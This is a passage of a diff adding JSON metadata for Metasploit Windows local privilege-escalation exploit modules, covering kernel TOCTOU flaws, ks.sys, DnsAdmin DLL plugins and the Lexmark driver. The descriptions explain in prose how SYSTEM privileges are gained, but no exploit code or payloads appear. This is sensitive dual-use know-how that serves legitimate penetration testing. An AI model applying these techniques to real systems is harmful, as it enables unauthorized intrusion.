"shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_30088_authz_basep": { + "name": "Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes", + "fullname": "exploit/windows/local/cve_2024_30088_authz_basep", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-11", + "type": "exploit", + "author": [ + "tykawaii98", + "jheysel-r7" + ], + "description": "CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,\n Windows 11 and Windows Server 2022.\n\n The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when\n the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the\n kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure\n directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and\n `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading\n to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.", + "references": [ + "URL-https://github.com/tykawaii98/CVE-2024-30088", + "CVE-2024-30038" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2025-03-13 13:14:13 +0000", + "path": "/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2024_30088_authz_basep", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_35250_ks_driver": { + "name": "Windows Access Mode Mismatch LPE in ks.sys", + "fullname": "exploit/windows/local/cve_2024_35250_ks_driver", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-11", + "type": "exploit", + "author": [ + "AngelBoy", + "varwara", + "jheysel-r7" + ], + "description": "The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.\n There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,\n Windows 11, Windows Server 2022.", + "references": [ + "URL-https://github.com/varwara/CVE-2024-35250", + "URL-https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/", + "URL-https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html", + "CVE-2024-35250" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-11-06 09:13:51 +0000", + "path": "/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2024_35250_ks_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/dnsadmin_serverlevelplugindll": { + "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation", + "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-08", + "type": "exploit", + "author": [ + "Shay Ber", + "Imran E. Dawoodjee " + ], + "description": "This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the\n `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`\n named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service\n will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended\n when using a UNC path.\n\n Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,\n the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and\n users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus\n after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the\n `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key on the target computer may point to an nonexistant DLL,\n which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for\n this module for advice on how to resolve this issue should it occur.\n\n This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows\n Server version up to and including Windows Server 2019.", + "references": [ + "URL-https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "URL-https://adsecurity.org/?p=4064", + "URL-http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb", + "is_install_path": true, + "ref_name": "windows/local/dnsadmin_serverlevelplugindll", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/docker_credential_wincred": { + "name": "Docker-Credential-Wincred.exe Privilege Escalation", + "fullname": "exploit/windows/local/docker_credential_wincred", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-07-05", + "type": "exploit", + "author": [ + "Morgan Roman", + "bwatters-r7" + ], + "description": "This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.", + "references": [ + "CVE-2019-15752", + "URL-https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/local/docker_credential_wincred.rb", + "is_install_path": true, + "ref_name": "windows/local/docker_credential_wincred", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc": { + "name": "Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation", + "fullname": "exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-25", + "type": "exploit", + "author": [ + "Chris Lyne", + "Matteo Malvica", + "bcoles " + ], + "description": "Druva inSync client for Windows exposes a network service on TCP\n port 6064 on the local network interface. inSync versions 6.6.3\n and prior do not properly validate user-supplied program paths\n in RPC type 5 messages, allowing execution of arbitrary commands\n as SYSTEM.\n\n This module has been tested successfully on inSync versions\n 6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).", + "references": [ + "CVE-2019-3999", + "CVE-2020-5752", + "EDB-48400", + "EDB-48505", + "EDB-49211", + "PACKETSTORM-157493", + "PACKETSTORM-157802", + "PACKETSTORM-160404", + "URL-https://www.tenable.com/security/research/tra-2020-12", + "URL-https://www.tenable.com/security/research/tra-2020-34", + "URL-https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py", + "URL-https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/gog_galaxyclientservice_privesc": { + "name": "GOG GalaxyClientService Privilege Escalation", + "fullname": "exploit/windows/local/gog_galaxyclientservice_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-04-28", + "type": "exploit", + "author": [ + "Joe Testa " + ], + "description": "This module will send arbitrary file_paths to the GOG GalaxyClientService, which will be executed\n with SYSTEM privileges (verified on GOG Galaxy Client v1.2.62 and v2.0.12; prior versions are\n also likely affected).", + "references": [ + "URL-https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/", + "CVE-2020-7352" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows (Dropper)" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/gog_galaxyclientservice_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ikeext_service": { + "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL", + "fullname": "exploit/windows/local/ikeext_service", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-10-09", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.", + "references": [ + "URL-https://www.htbridge.com/advisory/HTB23108", + "URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ikeext_service.rb", + "is_install_path": true, + "ref_name": "windows/local/ikeext_service", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ipass_launch_app": { + "name": "iPass Mobile Client Service Privilege Escalation", + "fullname": "exploit/windows/local/ipass_launch_app", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-12", + "type": "exploit", + "author": [ + "h0ng10" + ], + "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.", + "references": [ + "CVE-2015-0925", + "URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ipass_launch_app.rb", + "is_install_path": true, + "ref_name": "windows/local/ipass_launch_app", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/lenovo_systemupdate": { + "name": "Lenovo System Update Privilege Escalation", + "fullname": "exploit/windows/local/lenovo_systemupdate", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-04-12", + "type": "exploit", + "author": [ + "Michael Milvich", + "Sofiane Talmat", + "h0ng10" + ], + "description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service provides the possibility to execute arbitrary\n commands as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.", + "references": [ + "OSVDB-121522", + "CVE-2015-2219", + "URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/lenovo_systemupdate.rb", + "is_install_path": true, + "ref_name": "windows/local/lenovo_systemupdate", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/lexmark_driver_privesc": { + "name": "Lexmark Driver Privilege Escalation", + "fullname": "exploit/windows/local/lexmark_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-07-15", + "type": "exploit", + "author": [ + "Jacob Baines", + "Shelby Pace", + "Grant Willcox" + ], + "description": "Various Lexmark Universal Printer drivers as listed at advisory TE953\n allow low-privileged authenicated users to elevate their privileges to\n SYSTEM on affected Windows systems by modifying the XML file at\n C:\\ProgramData\\\\Universal Color Laser.gdl\n to replace the DLL path to unires.dll with a malicious DLL path.\n\n When C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is\n then used to add the printer to the affected system, PrintIsolationHost.exe,\n a Windows process running as NT AUTHORITY\\SYSTEM, will inspect the\n C:\\ProgramData\\\\Universal Color Laser.gdl file and will\n load the malicious DLL from the path specified in the file. This which will\n result in the malicious DLL executing as NT AUTHORITY\\SYSTEM.\n\n Once this module is finished, it will use the prnmngr.vbs script\n to remove the printer it added.", + "references": [ + "CVE-2021-35449", + "URL-http://support.lexmark.com/index?page=content&id=TE953", + "URL-https://github.com/jacob-baines/concealed_position", + "URL-https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/lexmark_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/linqpad_deserialization_persistence": { + "name": "LINQPad Deserialization Exploit", + "fullname": "exploit/windows/local/linqpad_deserialization_persistence", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-12-03", + "type": "exploit", + "author": [ + "msutovsky-r7 ", + "James Williams" + ], + "description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.", + "references": [ + "URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad", + "CVE-2024-53326" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2025-05-06 08:43:57 +0000", + "path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/linqpad_deserialization_persistence", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/microfocus_operations_privesc": { + "name": "Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation", + "fullname": "exploit/windows/local/microfocus_operations_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-28", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge\n Manager and Operations Bridge Reporter.\n An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and\n then access it without authentication by making a request to the OBM / OBR server.\n This will result in automatic code execution as SYSTEM. This module has been tested on\n OBM 2020.05 and OBR 10.40, but it should work out of the box on earlier versions too.\n Note that it is only exploitable on Windows installations.", + "references": [ + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md", + "CVE-2020-11858", + "CVE-2020-11855", + "ZDI-20-1326", + "ZDI-20-1217" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Micro Focus Operations Bridge Manager (Windows) <= 2020.05", + "Micro Focus Operations Bridge Reporter (Windows) <= 10.40" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/microfocus_operations_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/microfocus_operations_privesc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/mov_ss": { + "name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/mov_ss", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-05-08", + "type": "exploit", + "author": [ + "Nick Peterson", + "Nemanja Mulasmajic", + "Can Bölük ", + "bwatters-r7" + ], + "description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.", + "references": [ + "CVE-2018-8897", + "EDB-44697", + "BID-104071", + "URL-https://github.com/can1357/CVE-2018-8897/", + "URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/mov_ss.rb", + "is_install_path": true, + "ref_name": "windows/local/mov_ss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/mqac_write": { + "name": "MQAC.sys Arbitrary Write Privilege Escalation", + "fullname": "exploit/windows/local/mqac_write", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-22", + "type": "exploit", + "author": [ + "Matt Bergin", + "Spencer McIntyre" + ], + "description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.", + "references": [ + "CVE-2014-4971", + "EDB-34112", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/mqac_write.rb", + "is_install_path": true, + "ref_name": "windows/local/mqac_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms10_015_kitrap0d": { + "name": "Windows SYSTEM Escalation via KiTrap0D", + "fullname": "exploit/windows/local/ms10_015_kitrap0d", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-01-19", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "HD Moore", + "Pusscat", + "OJ Reeves" + ], + "description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.", + "references": [ + "CVE-2010-0232", + "OSVDB-61854", + "MSB-MS10-015", + "EDB-11199", + "URL-https://seclists.org/fulldisclosure/2010/Jan/341" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2K SP4 - Windows 7 (x86)" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb", + "is_install_path": true, + "ref_name": "windows/local/ms10_015_kitrap0d", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms10_092_schelevator": { + "name": "Windows Escalate Task Scheduler XML Privilege Escalation", + "fullname": "exploit/windows/local/ms10_092_schelevator", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-09-13", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, In a default\n configuration, normal users can read and write the task files that they have\n created. By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.", + "references": [ + "OSVDB-68518", + "CVE-2010-3338", + "BID-44357", + "MSB-MS10-092", + "EDB-15589" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Vista / 7 / 2008 (Dropper)", + "Windows Vista / 7 / 2008 (Command)" + ], + "mod_time": "2022-08-19 15:19:28 +0000", + "path": "/modules/exploits/windows/local/ms10_092_schelevator.rb", + "is_install_path": true, + "ref_name": "windows/local/ms10_092_schelevator", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms11_080_afdjoinleaf": { + "name": "MS11-080 AfdJoinLeaf Privilege Escalation", + "fullname": "exploit/windows/local/ms11_080_afdjoinleaf", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-11-30", + "type": "exploit", + "author": [ + "Matteo Memelli", + "Spencer McIntyre" + ], + "description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.", + "references": [ + "CVE-2011-2005", + "OSVDB-76232", + "EDB-18176", + "MSB-MS11-080", + "URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP2 / SP3", + "Windows Server 2003 SP2" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb", + "is_install_path": true, + "ref_name": "windows/local/ms11_080_afdjoinleaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_005_hwnd_broadcast": { + "name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation", + "fullname": "exploit/windows/local/ms13_005_hwnd_broadcast", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-27", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "Axel Souchet", + "Ben Campbell " + ], + "description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.", + "references": [ + "CVE-2013-0008", + "MSB-MS13-005", + "OSVDB-88966", + "URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_005_hwnd_broadcast", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ms13_053_schlamperei": { + "name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)", + "fullname": "exploit/windows/local/ms13_053_schlamperei", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-12-01", + "type": "exploit", + "author": [ + "Nils", + "Jon", + "Donato Capitella ", + "Ben Campbell " + ], + "description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.", + "references": [ + "CVE-2013-1300", + "MSB-MS13-053", + "URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_053_schlamperei", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_081_track_popup_menu": { + "name": "Windows TrackPopupMenuEx Win32k NULL Page", + "fullname": "exploit/windows/local/ms13_081_track_popup_menu", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "Seth Gibson", + "Dan Zentner", + "Matias Soler", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.", + "references": [ + "CVE-2013-3881", + "OSVDB-98212", + "BID-62830", + "MSB-MS13-081", + "URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html", + "URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_081_track_popup_menu", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_097_ie_registry_symlink": { + "name": "MS13-097 Registry Symlink IE Sandbox Escape", + "fullname": "exploit/windows/local/ms13_097_ie_registry_symlink", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "James Forshaw", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Internet Explorer Sandbox which allows to\n escape the Enhanced Protected Mode and execute code with Medium Integrity. The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to user influenced keys.\n By using registry symlinks it's possible force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.", + "references": [ + "CVE-2013-5045", + "MSB-MS13-097", + 